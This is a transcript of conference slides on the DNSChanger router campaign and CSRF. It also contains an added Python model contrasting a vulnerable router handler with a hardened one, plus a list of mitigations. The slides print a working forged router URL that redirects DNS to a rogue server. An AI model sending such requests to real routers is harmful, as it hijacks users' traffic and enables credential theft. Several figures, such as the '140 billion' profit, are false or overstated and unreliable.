11 (IDNOG01) DNS Changer by Alfonso Tanujaya
Transcript of 11 (IDNOG01) DNS Changer by Alfonso Tanujaya
DNSChanger 2014
Alfons Tanujaya
DNSChanger 2007
• Active 2007 - 2011. Infected more than 4 million computers, PC and Mac. Online advertising, spam, scams. Profit: 140 billion. 8 March 2012, servers brought down: a small internet apocalypse?
DNSChanger 2014
What is this?
• No antivirus of any brand can deal with this malware. It affects not only Windows but also Linux, Mac and Android phones. Even if the computer is formatted, it comes back. Sea-surf = CSRF
CSRF: Cross Site Request Forgery
A type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser. The attack is blind, so it is not good for credential stealing. But an ordinary weapon in a smart criminal's hands can be deadly.
[Diagram: normal login flow: GET login form → POST username/password → session cookie set. CSRF flow: GET attacker page with an auto-submitted form → POST sent with the session cookie.]
DNSChanger 2014
• Changing the DNS of vulnerable routers. Log all traffic → proxy, credential leak. Leads to malware installation. Leads to forged websites, which can leak credentials. Improper advertisements, porn, malware, etc. How many victims? 300,000 routers x 5 users = 1.5 million computers.
How it happens
A single GET request to the router's DHCP settings page changes the DNS servers it hands out:
http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=162.248.99.162&dnsserver2=199.85.127.10&Save=%B1%A3+%B4%E6
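As an added example (not from the talk, and not any vendor's firmware), the following toy Python model shows why the request above works and what a fixed firmware would do differently: the first handler honours any request that carries a valid session cookie, GET included, which is exactly what the forged URL relies on; the second handler is the same endpoint hardened with the usual CSRF defences (state changes only via POST, a same-origin check on the Origin header, and a per-session synchronizer token). The Router class, the handler names, the request-dictionary layout, the session/token scheme and the attacker origin are all assumptions constructed for this example; the URL and DNS values are the ones on the slide.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

ROUTER_ORIGIN = "http://192.168.1.1"
SETTINGS_PATH = "/userRpm/LanDhcpServerRpm.htm"

# The forged request from the slide, reassembled onto one line.
FORGED_URL = (ROUTER_ORIGIN + SETTINGS_PATH
              + "?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199"
              + "&Lease=120&gateway=0.0.0.0&domain=&dnsserver=162.248.99.162"
              + "&dnsserver2=199.85.127.10&Save=%B1%A3+%B4%E6")


class Router:
    """Toy router state (assumed layout): DHCP-advertised DNS servers plus a session -> CSRF token map."""

    def __init__(self):
        self.dns = ("0.0.0.0", "0.0.0.0")
        self.sessions = {}

    def login(self):
        sid = secrets.token_hex(16)                  # value of the session cookie
        self.sessions[sid] = secrets.token_hex(16)   # synchronizer token bound to this session
        return sid


def handle_vulnerable(router, req):
    """Models the pre-fix behaviour: a valid session cookie is all it takes, even on a GET."""
    parts = urlsplit(req["url"])
    if req.get("cookie") not in router.sessions:
        return 401
    if parts.path != SETTINGS_PATH:
        return 404
    q = parse_qs(parts.query)
    if "Save" in q:
        router.dns = (q["dnsserver"][0], q["dnsserver2"][0])
    return 200


def handle_hardened(router, req):
    """Same endpoint with CSRF defences; fails closed on any missing header or token."""
    parts = urlsplit(req["url"])
    sid = req.get("cookie")
    if sid not in router.sessions:
        return 401
    if parts.path != SETTINGS_PATH:
        return 404
    # 1. State changes only via POST, so an <img src=...> or a plain link cannot trigger them.
    if req["method"] != "POST":
        return 405
    # 2. The browser-supplied Origin must be the router itself; an absent Origin counts as foreign.
    if req.get("headers", {}).get("Origin") != ROUTER_ORIGIN:
        return 403
    # 3. The form must carry the token bound to this session (constant-time compare).
    body = parse_qs(req.get("body", ""))
    token = body.get("csrf_token", [""])[0]
    if not hmac.compare_digest(token.encode(), router.sessions[sid].encode()):
        return 403
    if "Save" in body:
        router.dns = (body["dnsserver"][0], body["dnsserver2"][0])
    return 200


def demo():
    """Replay the forged request against both handlers; returns (status, dns) per scenario."""
    out = {}

    r = Router()
    sid = r.login()
    forged_get = {"method": "GET", "url": FORGED_URL, "cookie": sid}
    out["vulnerable_forged_get"] = (handle_vulnerable(r, forged_get), r.dns)

    r = Router()
    sid = r.login()
    forged_get = {"method": "GET", "url": FORGED_URL, "cookie": sid}
    out["hardened_forged_get"] = (handle_hardened(r, forged_get), r.dns)

    # An auto-submitted form on an attacker page (constructed origin): the browser attaches the
    # cookie and the attacker's Origin, but the page cannot read the session's token.
    forged_post = {"method": "POST", "url": ROUTER_ORIGIN + SETTINGS_PATH, "cookie": sid,
                   "headers": {"Origin": "http://attacker.example"},
                   "body": "dnsserver=162.248.99.162&dnsserver2=199.85.127.10&Save=Save"}
    out["hardened_forged_post"] = (handle_hardened(r, forged_post), r.dns)

    # The admin's own form, served by the router with the token embedded.
    legit_post = {"method": "POST", "url": ROUTER_ORIGIN + SETTINGS_PATH, "cookie": sid,
                  "headers": {"Origin": ROUTER_ORIGIN},
                  "body": f"dnsserver=8.8.8.8&dnsserver2=8.8.4.4&Save=Save&csrf_token={r.sessions[sid]}"}
    out["hardened_legit_post"] = (handle_hardened(r, legit_post), r.dns)
    return out


if __name__ == "__main__":
    for name, (status, dns) in demo().items():
        print(f"{name:24s} -> HTTP {status}, DNS now {dns}")
```

Running the script shows the forged GET succeeding against the first handler and the DNS servers being replaced, while the hardened handler rejects the same GET with 405 and the cross-origin POST with 403, and accepts only the admin's own form that carries the session token. The Origin check and the token are deliberately independent: either one alone blocks the forged form, so a browser that omits Origin does not silently reopen the hole.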
List of vulnerable routers
• TP-Link
• D-Link
• Micronet
• Tenda
Solution
Sea Surf
Sea Monkey
Solution
• Upgrade the firmware (not always successful) → OpenWRT (WiT?)
• Set the DNS on the client to the ISP's or Google's DNS: the local DNS setting overrides the router's, unless the router forces its own
• 2FA challenge token
• Do not use web-based administration
• Use HTTPS
• Use a separate browser dedicated to router administration, different from the one used for browsing
Resource
http://cxsecurity.com/issue/WLB-2012100027